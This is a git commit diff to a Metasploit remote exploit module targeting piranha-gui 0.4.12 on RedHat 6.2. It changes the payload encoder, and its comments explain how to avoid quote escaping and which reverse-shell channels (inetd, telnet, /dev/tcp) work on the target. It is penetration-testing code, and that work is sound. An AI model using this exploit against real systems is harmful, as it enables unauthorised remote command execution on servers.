clarify limitations, update to use PrintfUtil encoder
git-svn-id: file:///home/svn/framework3/trunk@9614 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f0a4812644
commit
3cb116db99
|
@ -49,17 +49,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x22\x27", # magic_quotes_gpc
|
||||
# NOTE: We specify our own custom-ish encoder here.
|
||||
# This is due to lots of incompatabilities with the old RedHat 6.2 test system.
|
||||
# 1. inetd exists, but the syntax is no good.
|
||||
# 2. telnet exists
|
||||
# 3. /dev/tcp doesn't work.
|
||||
# 4. PHP's magic_quotes_gpc is on by default, causing escaping of single/double quotes.
|
||||
# 5. echo -ne doesn't work
|
||||
'EncoderType' => Msf::Encoder::Type::PrintfUtil,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic',
|
||||
# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
|
||||
# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
|
||||
[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
@ -78,7 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_raw({
|
||||
'uri' => str,
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'headers' =>
|
||||
{
|
||||
'content-type' => 'application/x-www-form-urlencoded',
|
||||
},
|
||||
}, 3)
|
||||
|
@ -92,4 +99,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue